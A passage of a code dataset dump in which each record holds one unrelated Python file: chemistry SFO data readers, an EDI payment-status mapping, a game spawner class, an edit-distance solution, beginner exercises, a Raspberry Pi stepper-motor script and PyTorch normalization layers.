SFOs of both fragments. \"\"\"\r\n n_active_sfos = int(kf_file.read(\"SFOs\", \"number\")) # type: ignore\r\n return n_active_sfos\r\n\r\n\r\ndef get_sfo_indices_of_one_frag(kf_file: KFFile, frag_index: int) -> Sequence[int]:\r\n \"\"\" Returns the indices of *active* SFOs belonging to one fragment. \"\"\"\r\n sfo_frag_indices = list(kf_file.read(\"SFOs\", \"fragment\", return_as_list=True)) # type: ignore\r\n sfo_frag_indices = [i for i, sfo_frag_index in enumerate(sfo_frag_indices) if sfo_frag_index == frag_index]\r\n return sfo_frag_indices\r\n\r\n\r\ndef get_irrep_each_sfo_one_frag(kf_file: KFFile, frag_index: int) -> Sequence[str]:\r\n sfo_indices_one_frag = get_sfo_indices_of_one_frag(kf_file, frag_index=frag_index)\r\n frag_symlabels_each_sfo = list(kf_file.read(\"SFOs\", \"subspecies\").split()) # type: ignore\r\n frag_symlabels_each_sfo = [frag_symlabels_each_sfo[i] for i in sfo_indices_one_frag]\r\n return frag_symlabels_each_sfo\r\n\r\n\r\ndef get_ordered_irreps_of_one_frag(kf_file: KFFile, frag_index: int) -> list[str]:\r\n \"\"\" Returns the ordered irreps of *active* SFOs (frozen core SFOs excluded) belonging to one fragment. \"\"\"\r\n sfo_frag_indices = get_sfo_indices_of_one_frag(kf_file, frag_index=frag_index)\r\n all_sfo_irreps: list[str] = kf_file.read(\"SFOs\", \"subspecies\", return_as_list=True).split() # type: ignore\r\n sfo_irreps_of_one_frag = list(dict.fromkeys([all_sfo_irreps[i] for i in sfo_frag_indices]))\r\n return sfo_irreps_of_one_frag\r\n\r\n\r\ndef get_number_sfos_per_irrep_per_frag(kf_file: KFFile, frag_index: int) -> dict[str, int]:\r\n \"\"\" Returns the number of *active* SFOs of each irrep (frozen core SFOs excluded) belonging to one fragment. \"\"\"\r\n sfo_irreps = get_irrep_each_sfo_one_frag(kf_file, frag_index=frag_index)\r\n sfo_irrep_sum = {irrep: sfo_irreps.count(irrep) for irrep in set(sfo_irreps)}\r\n return sfo_irrep_sum\r\n\r\n\r\n# --------------------Frozen Core Handling-------------------- #\r\n\r\ndef get_frozen_cores_per_irrep(kf_file: KFFile, frag_index: int) -> dict[str, int]:\r\n \"\"\"\r\n Reads the number of frozen cores per irrep from the KFFile.\r\n\r\n The number of frozen cores per irrep is important for getting gross populations and overlap analysis.\r\n Basically, the SFO index shown in AMSLevels is different than the index shown in the overlap and population analysis because they can be shifted by frozen cores.\r\n\r\n Moreover, if the complex calculation uses symmetry, but the fragments themselves do not, then the \"A\" irrep is added, being the sum of all frozen cores.\r\n\r\n In case there is no frozen core and no symmetry, but the fragments use symmetry, then the frozen core is 0 for all irreps that are present in the fragments.\r\n \"\"\"\r\n ordered_frag_irreps = get_ordered_irreps_of_one_frag(kf_file, frag_index=frag_index)\r\n n_core_orbs_per_irrep: list[int] = kf_file.read(\"Symmetry\", \"ncbs\", return_as_list=True) # type: ignore since n_core_orbs is a list of ints\r\n\r\n frozen_core_per_irrep = {irrep: n_frozen_cores for irrep, n_frozen_cores in zip(ordered_frag_irreps, n_core_orbs_per_irrep)} # type: ignore\r\n\r\n # Add the \"A\" irrep to the dictionary for the case when symmetry is not used (e.g. NoSym), but the fragments themselves use symmetry.\r\n # This is only used for the overlap analysis.\r\n if not uses_symmetry(kf_file):\r\n frozen_core_per_irrep[\"A\"] = sum(n_core_orbs_per_irrep)\r\n return frozen_core_per_irrep\r\n\r\n\r\n# --------------------Restricted Property Function(s)-------------------- #\r\n\r\ndef get_orbital_energies(kf_file: KFFile, spin: str = SpinTypes.A) -> Array1D[np.float64]:\r\n \"\"\" Reads the orbital energies from the KFFile. \"\"\"\r\n # escale refers energies scaled by relativistic effects (ZORA). If no relativistic effects are present, \"energy\" is the appropriate key.\r\n variable = \"escale\" if (\"SFOs\", \"escale\") in kf_file else \"energy\"\r\n\r\n # It is either \"escale\" or \"escale_B\", apparently there is no \"escale_A\" key (same for \"energy\")\r\n if spin == SpinTypes.B and (\"SFOs\", f\"{variable}_{SpinTypes.B}\") in kf_file:\r\n variable = f\"{variable}_{SpinTypes.B}\"\r\n\r\n # Reads the orbital energies for both fragments and selects the data for the current fragment\r\n orb_energies = np.array(kf_file.read(\"SFOs\", variable)) # type: ignore\r\n\r\n return orb_energies\r\n\r\n\r\ndef get_occupations(kf_file: KFFile, spin: str = SpinTypes.A) -> Array1D[np.float64]:\r\n \"\"\" Reads the occupations from the KFFile. \"\"\"\r\n # It is either \"occupation\" or \"occupation_B\", apparently there is no \"occupation_A\" key\r\n occupation_key = f\"occupation_{SpinTypes.B}\" if spin == SpinTypes.B and (\"SFOs\", f\"occupation_{SpinTypes.B}\") in kf_file else \"occupation\"\r\n occupations = np.array(kf_file.read(\"SFOs\", occupation_key)) # type: ignore\r\n\r\n return occupations\r\n\r\n\r\n# --------------------Unrestricted Property Function(s)-------------------- #\r\n\r\n\r\n# --------------------Property to Function Mapping-------------------- #\r\n\r\n\r\n# Format: {property: (callable function for reading property, section in KFFile, variable in KFFile)}\r\nRESTRICTED_KEY_FUNC_MAPPING: dict[str, Callable] = {\r\n \"orb_energies\": get_orbital_energies,\r\n \"occupations\": get_occupations,\r\n}\r\n\r\n# --------------------Interface Function(s)-------------------- #\r\n\r\n\r\ndef get_fragment_properties(kf_file: KFFile, frag_index: int) -> UnrestrictedPropertyDict:\r\n \"\"\"\r\n Returns a dictionary of dictionaries with the properties of the fragments.\r\n\r\n The properties are:\r\n - Orbital Energies\r\n - Occupations\r\n\r\n Output format:\r\n {\r\n spin (\"A\"/\"B\"): {\r\n property (\"orb_energies\" / occupations): {\r\n irrep (e.g., \"A1\", \"B2\", \"E1:1\"): [data]\r\n }\r\n\r\n Note: this will produce double the amount of data when restricted fragments are used because the spin key is not needed for restricted fragments.\r\n Currently, the \"B\" spin is discarded for restricted calcs in the `create_fragment_data` function.\r\n \"\"\"\r\n sfo_indices_of_one_frag = get_sfo_indices_of_one_frag(kf_file, frag_index)\r\n frag_irreps_each_sfo = get_irrep_each_sfo_one_frag(kf_file, frag_index)\r\n\r\n data_dic_to_be_unpacked = {property: {str(spin): {} for spin in SpinTypes} for property in RESTRICTED_KEY_FUNC_MAPPING}\r\n\r\n for property, func in RESTRICTED_KEY_FUNC_MAPPING.items():\r\n\r\n for spin in SpinTypes:\r\n\r\n data = func(kf_file, spin=spin)\r\n\r\n data = np.array([data[i] for i in sfo_indices_of_one_frag])\r\n\r\n # Now we turn one long array into a dictionary of arrays sorted by irreps (e.g. [.....] -> {\"A1\": [.....], \"A2\": [.....]})\r\n data_dic_to_be_unpacked[property][spin] = split_1d_array_into_dict_sorted_by_irreps(data_array=data, irreps=frag_irreps_each_sfo)\r\n\r\n return data_dic_to_be_unpacked\r\n\r\n\r\ndef get_gross_populations(kf_file: KFFile, frag_index: int = 1) -> dict[str, dict[str, Array1D[np.float64]]]:\r\n \"\"\"\r\n Reads the gross populations from the KFFile by taking into account the frozen cores.\r\n Annoyingly, the \"SFOs\" sections contains the SFOs of both fragments that ALREADY HAVE BEEN FILTERED for the frozen cores.\r\n For example, the SFOs number may be 114, but the gross population array may have 148 entries. This is because the first 34 entries are the frozen cores.\r\n\r\n Structure of the (\"SFOs popul\",\"sfo_grosspop\") section for a restricted calculation with c3v symmetry:\r\n [n Frozen Cores A1, Active SFOs Frag1 A1, Active SFOs Frag2 A1, n Frozen Cores A2, Active SFOs Frag1 A2, Active SFOs Frag2 A2, ...]\r\n\r\n Therefore, the sum of `sfo_indices_of_one_frag` and `n_frozen_cores_per_irrep` is used to get the correct indices for SFOs on both fragments and all irreps.\r\n\r\n Output format:\r\n {\r\n spin (\"A\"/\"B\"): {\r\n irrep (e.g., \"A1\", \"B2\", \"E1:1\"): [data]\r\n }\r\n \"\"\"\r\n symmetry_used = uses_symmetry(kf_file)\r\n frags_sfo_irrep_sums = [get_number_sfos_per_irrep_per_frag(kf_file, frag_index=frag_index) for frag_index in [1, 2]]\r\n\r\n ordered_irreps = get_ordered_irreps_of_one_frag(kf_file, frag_index=frag_index)\r\n frozen_core_per_irrep = get_frozen_cores_per_irrep(kf_file, frag_index=frag_index)\r\n\r\n raw_gross_pop_all_sfos = np.array(kf_file.read(\"SFO popul\", \"sfo_grosspop\"))\r\n\r\n if not symmetry_used:\r\n start_index = sum(frozen_core_per_irrep.values())\r\n total_sfo_sum_frag1 = sum(frags_sfo_irrep_sums[0][irrep] for irrep in frags_sfo_irrep_sums[0])\r\n total_sfo_sum_frag2 = sum(frags_sfo_irrep_sums[1][irrep] for irrep in frags_sfo_irrep_sums[1])\r\n total_sfo_for_one_spin = total_sfo_sum_frag1 + total_sfo_sum_frag2 + start_index\r\n\r\n if frag_index == 1:\r\n return {\r\n SpinTypes.A: {\"A\": raw_gross_pop_all_sfos[start_index: start_index + total_sfo_sum_frag1]},\r\n SpinTypes.B: {\"A\": raw_gross_pop_all_sfos[total_sfo_for_one_spin:total_sfo_for_one_spin + total_sfo_sum_frag1]}\r\n }\r\n\r\n return {\r\n SpinTypes.A: {\"A\": raw_gross_pop_all_sfos[start_index + total_sfo_sum_frag1: start_index + total_sfo_sum_frag1 + total_sfo_sum_frag2]},\r\n SpinTypes.B: {\"A\": raw_gross_pop_all_sfos[total_sfo_for_one_spin + total_sfo_sum_frag1: total_sfo_for_one_spin + total_sfo_sum_frag1 + total_sfo_sum_frag2]}\r\n }\r\n\r\n gross_pop_active_sfos = {str(spin): {irrep: np.zeros_like(frags_sfo_irrep_sums[frag_index-1][irrep], dtype=np.float64) for irrep in frags_sfo_irrep_sums[frag_index - 1]} for spin in SpinTypes}\r\n\r\n # only works if frag1 and frag2 have the same irreps and thus belong to the same point group\r\n for spin in SpinTypes:\r\n raw_gross_pop_index = 0 if spin == SpinTypes.A else get_total_number_sfos(kf_file) + sum(frozen_core_per_irrep.values())\r\n for irrep in ordered_irreps:\r\n n_frozen_cores = frozen_core_per_irrep.get(irrep, 0)\r\n n_sfos_frag1 = frags_sfo_irrep_sums[0][irrep]\r\n n_sfos_frag2 = frags_sfo_irrep_sums[1][irrep]\r\n start_irrep_index = raw_gross_pop_index + n_frozen_cores\r\n\r\n if frag_index == 1:\r\n end_irrep_index = start_irrep_index + n_sfos_frag1\r\n else:\r\n start_irrep_index += n_sfos_frag1\r\n end_irrep_index = start_irrep_index + n_sfos_frag2\r\n\r\n gross_pop_active_sfos[spin][irrep] = raw_gross_pop_all_sfos[start_irrep_index: end_irrep_index]\r\n\r\n raw_gross_pop_index += sum(frags_sfo_irrep_sums[frag_i][irrep] for frag_i in [0, 1]) + n_frozen_cores\r\n\r\n return gross_pop_active_sfos\r\n\r\n\r\n# def main():\r\n# import pathlib as pl\r\n\r\n# current_dir = pl.Path(__file__).parent\r\n# rkf_dir = current_dir.parent.parent.parent / \"test\" / \"fixtures\" / \"rkfs\"\r\n# # rkf_file = 'restricted_largecore_differentfragsym_c4v_full.adf.rkf'\r\n# rkf_file = 'unrestricted_largecore_fragsym_c3v_full.adf.rkf'\r\n# kf_file = KFFile(str(rkf_dir / rkf_file))\r\n\r\n # print(get_orbital_energies(kf_file))\r\n\r\n # print(get_occupations(kf_file))\r\n # print(get_number_sfos_per_irrep_per_frag(kf_file, frag_index=1))\r\n # print(get_frag_name(kf_file, frag_index=2))\r\n # data = get_fragment_properties(kf_file, frag_index=1)\r\n # pprint(data)\r\n # grospop = get_gross_populations(kf_file, frag_index=1)\r\n # print(grospop)\r\n\r\n\r\n# if __name__ == \"__main__\":\r\n# main()\r\n","repo_name":"SiebeLeDe/orbitals","sub_path":"src/orb_analysis/orb_functions/sfo_functions.py","file_name":"sfo_functions.py","file_ext":"py","file_size_in_byte":14669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"10096853824","text":"import bots.transform as transform\n\n\ndef main(inn, out):\n\n # Get the original payment id from the original message Id\n original_message_id = inn.get(\n {'BOTSID': 'Document'},\n {'BOTSID': 'CstmrPmtStsRpt'},\n {'BOTSID': 'OrgnlGrpInfAndSts', 'OrgnlMsgId': None})\n\n # transform.persist_add_update('message_lookup', 'MG12', 'USA65')\n # transform.persist_add_update('message_lookup', 'MG13', 'USA92')\n\n original_payment_id = transform.persist_lookup(\n 'message_lookup', original_message_id)\n\n group_status = inn.get({'BOTSID': 'Document'},\n {'BOTSID': 'CstmrPmtStsRpt'},\n {'BOTSID': 'OrgnlGrpInfAndSts', 'GrpSts': None})\n out.data.header = {\n 'payment_identifier': original_payment_id or original_message_id,\n 'transaction_count': inn.get({'BOTSID': 'Document'},\n {'BOTSID': 'CstmrPmtStsRpt'},\n {'BOTSID': 'OrgnlGrpInfAndSts',\n 'OrgnlNbOfTxs': None}),\n\n 'status': transform.ccode('Payment Status', group_status, safe=True)\n }\n\n out.data.lines = []\n for pmt_inf in inn.getloop({'BOTSID': 'Document'},\n {'BOTSID': 'CstmrPmtStsRpt'},\n {'BOTSID': 'OrgnlPmtInfAndSts'}):\n\n for txn_inf in pmt_inf.getloop({'BOTSID': 'OrgnlPmtInfAndSts'},\n {'BOTSID': 'TxInfAndSts'}):\n\n status = txn_inf.get({'BOTSID': 'TxInfAndSts', 'TxSts': None})\n additional_status = txn_inf.get({'BOTSID': 'TxInfAndSts'},\n {'BOTSID': 'StsRsnInf'},\n {'BOTSID': 'Rsn', 'Cd': None})\n out.data.lines.append({\n 'endtoend_identifier': txn_inf.get({'BOTSID': 'TxInfAndSts',\n 'OrgnlEndToEndId': None}),\n 'status_identifier': txn_inf.get({'BOTSID': 'TxInfAndSts',\n 'StsId': None}),\n 'status': transform.ccode('Payment Status', status),\n 'additional_status_code': transform.ccode(\n 'Additional Payment Status', additional_status, safe=True),\n 'additional_status_text': txn_inf.get({'BOTSID': 'TxInfAndSts'},\n {'BOTSID': 'StsRsnInf',\n 'AddtlInf': None})\n })\n","repo_name":"abhishek-ram/watg-bots","sub_path":"usersys/mappings/xml/payment_status_xml2html.py","file_name":"payment_status_xml2html.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"33637073493","text":"#Embedded file name: c:/depot/games/branches/release/EVE-TRANQUILITY/carbon/common/script/entities/Spawners/actionProcSpawner.py\nimport GameWorld\nimport cef\n\nclass ActionProcSpawner(cef.RuntimeSpawner):\n __guid__ = 'cef.ActionProcSpawner'\n\n def __init__(self, entitySceneID, dynamicSpawnID, recipeTypeID, posProp, rotProp):\n position = GameWorld.GetPropertyForCurrentPythonProc(posProp)\n rotation = GameWorld.GetPropertyForCurrentPythonProc(rotProp)\n cef.RuntimeSpawner.__init__(self, entitySceneID, dynamicSpawnID, recipeTypeID, position, rotation)","repo_name":"alexcmd/eve","sub_path":"eve-8.21.494548/carbon/common/script/entities/Spawners/actionProcSpawner.py","file_name":"actionProcSpawner.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"}
+{"seq_id":"13633370003","text":"class Solution:\n # opt[m][n] is the minimum edit distance required for word1[:m+1] and word2[:n+1]\n # if word1[m] == word2[n]: opt[m][n] = opt[m-1][n-1]\n # else:\n # 1: replace a character opt[m][n] = opt[m-1][n-1] + 1\n # 2: delete a character from word1 opt[m][n] = opt[m-1][n] + 1\n # 3: insert a charcter to word1 opt[m][n] = opt[m][n-1] + 1\n # opt[m][n] = minimum of above 3 cases.\n # Since we add a padding for opt, when we consider the solution at position (m,n)\n # We are checking the char of word1[m-1] and word2[n-1]\n # null h o r s e\n # null 0 1 2 3 4 5\n # r 1 N N N N N\n # o 2 N N N N N\n # s 3 N N N N N\n def minDistance(self, word1: str, word2: str) -> int:\n self.word1=word1\n self.word2=word2\n self.opt=[[None]*(len(word2)+1) for i in range(len(word1)+1)]\n for i in range(len(word2)+1):\n self.opt[0][i] = i\n for i in range(len(word1)+1):\n self.opt[i][0] = i\n return self.helper(len(word1),len(word2))\n\n \n def helper(self,m,n):\n if self.opt[m][n] is not None:\n return self.opt[m][n]\n if self.word1[m-1] == self.word2[n-1]:\n self.opt[m][n]=self.helper(m-1,n-1)\n else:\n self.opt[m][n]=min(self.helper(m-1,n-1)+1,self.helper(m,n-1)+1,self.helper(m-1,n)+1)\n return self.opt[m][n]\n \n \n ","repo_name":"ruifan831/leetCodeRecord","sub_path":"72_Edit_Distance.py","file_name":"72_Edit_Distance.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"5716751029","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/8/10 21:39 下午\n# @Author : HanChen\n# @File : 7_8.py\n# @Software: Sublime Text\n\n# ------------------ example01 ------------------\n\"\"\"\n7-8 熟食店:创建一个名为 sandwich_orders 的列表,在其中包含各种三明治的名字;再创建一个名为 finished_sandwiches 的空列表。\n 遍历列表 sandwich_orders,对于其中的每种三明治,都打印一条消息,如 I made your tuna sandwich,并将其移到列表finished_sandwiches。\n 所有三明治都制作好后,打印一条消息,将这些三明治列出来。\n\"\"\"\nsandwich_orders = ['veggie', 'grilled cheese', 'turkey', 'roast beef']\nfinished_sandwiches = []\n\nwhile sandwich_orders:\n current_sandwich = sandwich_orders.pop()\n print(\"I'm working on your \" + current_sandwich + \" sandwich.\")\n finished_sandwiches.append(current_sandwich)\n\nprint(\"\\n\")\nfor sandwich in finished_sandwiches:\n print(\"I made a \" + sandwich + \" sandwich.\")\n# ------------------ example01 ------------------\n","repo_name":"HanChen1988/PythonStudy","sub_path":"Book/BookNo001/Chapter_07/python_work/7_8.py","file_name":"7_8.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35530260348","text":"#!/usr/bin/python\n\n##--Michael duPont (flyinactor91.com)\n##--Turns a stepper motor based on the current gear setting. Higher gear means faster motor\n\nimport RPi.GPIO as GPIO\nimport time\n\nsevenseg = False\n\nif sevenseg:\n\tfrom Adafruit_7Segment import SevenSegment\n\tsegment = SevenSegment(address=0x70)\n\nGPIO.setmode(GPIO.BCM)\n\n#Setup Buttons\nstepUpPin = 25\nstepDownPin = 18\nGPIO.setup(stepUpPin , GPIO.IN)\nGPIO.setup(stepDownPin , GPIO.IN)\n\n#Display Function\ndef setNumber(value):\n\tif value < 0: segment.setColon(True)\n\telse: segment.setColon(False)\n\tsegment.writeDigit(0 , (abs(value) / 1000)%10)\n\tsegment.writeDigit(1 , (abs(value) / 100)%10)\n\tsegment.writeDigit(3 , (abs(value) / 10)%10)\n\tsegment.writeDigit(4 , abs(value) % 10)\n\ndelay = [0,20,17,14,12,10,8,7,6,5,4,3,2] #milliseconds\ngear , count = 0 , 0\nupdate = True\n\n#Main Loop\nwhile True:\n\tif (GPIO.input(stepUpPin) == False) and (GPIO.input(stepDownPin) == True):\n\t\tif gear < 12 and count == 15:\n\t\t\tgear += 1\n\t\t\tcount = 0\n\t\t\tupdate = True\n\telif (GPIO.input(stepDownPin) == False) and (GPIO.input(stepUpPin) == True):\n\t\tif gear > -12 and count == 15:\n\t\t\tgear = gear - 1\n\t\t\tcount = 0\n\t\t\tupdate = True\n\telif (GPIO.input(stepUpPin) == False) and (GPIO.input(stepDownPin) == False):\n\t\tgear , count = 0 , 0\n\t\tupdate = True\n\tif count < 15: count += 1\n\t#print gear\n\tif sevenseg and update:\n\t\tsetNumber(gear)\n\t\tupdate = False\n\tif gear > 0: forward(int(delay[gear]) / 1000.0, 1)\n\telif gear < 0: backwards(int(delay[abs(gear)]) / 1000.0, 1)\n\telse: time.sleep(0.1)\n","repo_name":"flyinactor91/Raspi-Hardware","sub_path":"Motors/StepSpeed.py","file_name":"StepSpeed.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"43053800299","text":"import sys\r\nimport json\r\n\r\ndef main():\r\n path = sys.argv[1]\r\n with open(path, \"r\", encoding=\"utf-8\") as fp:\r\n color_dict = json.load(fp)\r\n new_dict_arr = []\r\n for i, key in enumerate(color_dict):\r\n new_elem = {\r\n \"name\": key,\r\n \"color\": color_dict[key],\r\n \"sort_val\": i,\r\n \"is_active\": True\r\n }\r\n new_dict_arr.append(new_elem)\r\n with open(sys.argv[2], 'w', encoding=\"utf-8\") as fp:\r\n json.dump(new_dict_arr, fp, ensure_ascii=False, indent=4)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"R-Imai/dailyProgress-calculation","sub_path":"tools/color_config_update.py","file_name":"color_config_update.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"8715315456","text":"# 1. Set the variable `given_name` to the string \"Addison\".\ngiven_name = \"Addison\"\n\n# ------------------------------------------------------------------------------\n# 2. You have 20 candies that you must divide equally among 6 people. How many candies will be left over?\n# Set variables for `candies`, `people`, `left_over` to make your tests pass.\ncandies = 20\npeople = 6\nleft_over = candies % people\n\n# ------------------------------------------------------------------------------\n# 3. Create a function called `greeting` that returns \"Hello, !\",\n# where is the name given as an argument to the function.\ndef greeting(name):\n return f\"Hello, {name}!\"\n\n\n# ------------------------------------------------------------------------------\n# 4. Create a function called `is_odd` that, given a number, will\n# return true if the number is odd and false if it is not. An odd number is a\n# number which, when divided by 2, has a remainder of 1 or -1.\n\n# USING TRY/EXCEPT (I'm still trying to wrap my head around\n# try/except, even after getting this to work!):\ndef is_odd(number):\n output = False\n try:\n output = number % 2 == 1 or number % 2 == -1\n except TypeError:\n print(\"Does not compute\")\n return output\n\n# USING IF/ELSE:\n# def is_odd(number):\n# if number % 2 == 1 or number % 2 == -1:\n# return True\n# else:\n# return False\n\n# ------------------------------------------------------------------------------\n# 5. Create a function called `is_even` that, given a number, will\n# return true if the number is even and false if it is not. An even number is a\n# number which, when divided by 2, has a remainder of 0.\ndef is_even(number):\n #USING IS_ODD\n # return bool((not is_odd(number)) and (type(number) is int) and (number is not 0))\n\n # USING IF/ELSE:\n if number % 2 == 0:\n return True\n else:\n return False\n\n\n\n# ------------------------------------------------------------------------------\n# 6. Create a function called `fahrenheit_to_celsius` that takes a\n# Fahrenheit temperature as an argument and returns the\n# temperature in Celsius.\ndef fahrenheit_to_celsius(fahrenheit):\n celsius = (fahrenheit - 32) * 0.5556\n return int(celsius)\n\n# ------------------------------------------------------------------------------\n# 7. Create a function called `celsius_to_fahrenheit` that takes a\n# Celsius temperature as an argument and returns the\n# temperature in Fahrenheit.\ndef celsius_to_fahrenheit(celsius):\n fahrenheit = (celsius*1.8000) + 32\n return fahrenheit\n\n\n# ------------------------------------------------------------------------------\n# 8. Create a function called `fahrenheit_to_kelvin` that takes a\n# Fahrenheit temperature as an argument and returns the\n# temperature in Kelvin. This function must use your previous\n# fahrenheit_to_celsius function.\n# Absolute zero (0 K) is equivalent to −273.15 C.\n# 1 degree Kelvin equals 1 degree Celsius.\ndef fahrenheit_to_kelvin(fahrenheit):\n kelvin = fahrenheit_to_celsius(fahrenheit) + 273.15\n return kelvin\n\n# ------------------------------------------------------------------------------\n# 9. Create a function called `lesser` that takes two numbers as\n# arguments and returns the lesser of them. This function should\n# use an if/else statement.\ndef lesser(num1, num2):\n if num1 < num2:\n return num1\n elif num1 > num2:\n return num2\n else:\n return \"num1 and num2 are equal.\"\n\n\n# ------------------------------------------------------------------------------\n# 10. Create a function called `multigreeting` that takes a name\n# and a language code and returns a version of \"Hello, !\"\n# in the specified language. The supported languages and their\n# translations are below.\n#\n# en - Hello, !\n# es - ¡Hola, !\n# fr - Bonjour, !\n# eo - Saluton, !\n#\n# If any other language code is used, return nothing.\ndef multigreeting(name, language):\n # DICTIONARY\n try:\n multilanguage_greeting_dict = {\n \"en\": f\"Hello, {name}!\",\n \"es\": f\"¡Hola, {name}!\",\n \"fr\": f\"Bonjour, {name}!\",\n \"eo\": f\"Saluton, {name}!\"\n }\n return multilanguage_greeting_dict[language]\n except:\n return\n \n #NO DICTIONARY\n # if language == \"en\":\n # return \"Hello, \" + name + \"!\"\n # elif language == \"es\":\n # return \"¡Hola, \" + name + \"!\"\n # elif language == \"fr\":\n # return \"Bonjour, \" + name + \"!\"\n # elif language == \"eo\":\n # return \"Saluton, \" + name + \"!\"\n # else:\n # return\n\n# ------------------------------------------------------------------------------\n# 11. The greatest common divisor (https://en.wikipedia.org/wiki/Greatest_common_divisor)\n# is the largest integer that, given two other integers, can be divided into them. For\n# example, the greatest common divisor of 24 and 81 is 3. The greatest common divisor of\n# 10 and 25 is 5.\n#\n# One method of calculating the greatest common divisor is the \"binary GCD algorithm.\"\n# (https://en.wikipedia.org/wiki/Greatest_common_divisor#Binary_GCD_algorithm)\n# It can be written out like the following:\n#\n# Input: a, b positive integers\n# Output: The greatest common divisor, which is g * 2**d\n# d = 0\n# while a and b are both even\n# a = a/2\n# b = b/2\n# d = d + 1\n# while a != b\n# if a is even then a = a/2\n# else if b is even then b = b/2\n# else if a > b then a = (a – b)/2\n# else b = (b – a)/2\n# g = a\n# output g * 2**d\n\n\n# Write a function called `gcd` that takes two arguments and returns the greatest\n# common divisor using the instructions above.\ndef gcd(a, b):\n # TRYING TERNARY OPERATORS--THIS DIDN'T WORK\n # d = 0\n # while is_even(a) and is_even(b):\n # a = a / 2\n # b = b / 2\n # d = d + 1\n # while a != b:\n # a = a / 2 if is_even(a) else b = b / 2 if is_even(b) else a = (a - b) / 2 if a > b else b = (b - a) / 2\n # ALTERNATELY===\n # a = a / 2 if is_even(a) else (a - b) / 2\n # b = b / 2 if is_even(b) else (b - a) / 2\n # ===\n # g = a\n # return g * 2**d\n\n # TRYING A TUPLE WITH TERNARY OPERATORS\n counter = 0\n while is_even(a) and is_even(b):\n a = a / 2\n b = b / 2\n counter += 1\n ab_tuple = (a, b)\n while a != b:\n while is_even(a) or is_even(b):\n ab_tuple = (a/2, b/2) if is_even(a) and is_even(b) else (a/2, b) if is_even(a) \\\n and not is_even(b) else (a, b/2) if not is_even(a) and is_even(b) else (a, b)\n a = ab_tuple[0]\n b = ab_tuple[1]\n ab_tuple = ((a-b)/2, b) if a > b else (a, (b-a)/2)\n a = ab_tuple[0]\n b = ab_tuple[1]\n return a * 2**counter\n\n # ORIGINAL\n # counter = 0\n # while is_even(a) and is_even(b):\n # a = a / 2\n # b = b / 2\n # counter += 1\n # while a != b:\n # if is_even(a):\n # a = a / 2\n # elif is_even(b):\n # b = b / 2\n # elif a > b:\n # a = (a - b) / 2\n # else:\n # b = (b - a) / 2\n # g = a\n # return g * 2**counter\n","repo_name":"Momentum-PT-Team-3/python-problem-set-1-arieljsmith","sub_path":"problem_set_1.py","file_name":"problem_set_1.py","file_ext":"py","file_size_in_byte":7125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"28627058785","text":"import random \nfrom collections import Counter\nimport time\nimport math\nfrom functools import wraps\nimport json\n# =====================================================================================\n# 注释掉两条分割线之间的东西来使用\n\n\n# import numpy as np \n# import torch\n# from torch import nn\n# import pandas as pd\n# import click\n# # import time\n# # from functools import wraps\n\n\n# # 当我对func函数装饰的时候,自然需要传入func作为实参\n# # @add_time 等价于 add_time(func),因此我有一个新的函数g接住add_time的返回值,这里假设返回的函数是wrap_func\n# # 当我执行g的时候,实际上执行的是wrap_func,而执行wrap_func实际上主体在执行func,因此wrap_func的参数需要传func的参数\n# def add_time(func):\n# # 这个wraps是固定写法,为了函数文档和函数名字的不变\n# @wraps(func)\n# def wrap_func(*args,**kwds):\n# s = time.time()\n# # 这是我的函数的主体部分,我希望在前后加上一些东西\n# ans = func(*args,**kwds)\n# e = time.time()\n# print(f'Time for {func.__name__} is {e - s}s')\n# return ans\n# return wrap_func\n\n\n\n# class BatchNorm(nn.Module):\n# '''\n# input X is (B,C,H,W)\n# '''\n# def __init__(self):\n# super().__init__()\n\n# def forward(self,X):\n# return (X - X.mean(dim=(0,2,3),keepdim=True)) / X.std(dim=(0,2,3),keepdim=True)\n\n# class LayerNorm(nn.Module):\n# '''\n# input X is (B,C,H,W)\n# '''\n# def __init__(self):\n# super().__init__()\n\n# def forward(self,X):\n# return (X - X.mean(dim=(1,2,3),keepdim=True)) / X.std(dim=(1,2,3),keepdim=True)\n\n# class InstanceNorm(nn.Module):\n# '''\n# input X is (B,C,H,W)\n# '''\n# def __init__(self):\n# super().__init__()\n\n# def forward(self,X):\n# return (X - X.mean(dim=(2,3),keepdim=True)) / X.std(dim=(2,3),keepdim=True)\n\n\n# def shape_conv(h,h_k,stride,padding):\n# return int((h - h_k + stride + 2 * padding) / stride)\n\n# def shape_trans_conv(h,h_k,stride,padding,out_padding=0):\n# \"\"\"\n# H_out = (H_in - 1)*stride - 2*padding + kernel_size + out_padding\n# If we choose stride = 2,kernel_size = 2 and both padding are 0\n# Then the H and W are doubled\n# \"\"\"\n# return int(\n# (h - 1) * stride - 2 * padding + h_k + out_padding\n# )\n\n\n# def draw_table(m,mode):\n# \"\"\"\n# mode = 'add' or 'mul'\n# \"\"\"\n\n# sheet = np.zeros((m,m))\n# if mode == 'add':\n# for i in range(m):\n# for j in range(m):\n# sheet[i,j] = (i + j) % m\n# else:\n# for i in range(m):\n# for j in range(m):\n# sheet[i,j] = (i * j) % m\n\n# ans = pd.DataFrame(sheet)\n# ans.to_excel(f'm={m}_mode={mode}.xlsx')\n\n# class PixelNorm(nn.Module):\n# def __init__(self):\n# super(PixelNorm,self).__init__()\n \n# def forward(self,X):\n# tmp = X * X\n# return X / torch.sqrt(tmp.sum(dim=1,keepdim=True))\n\n# class Maxout(nn.Module):\n# def 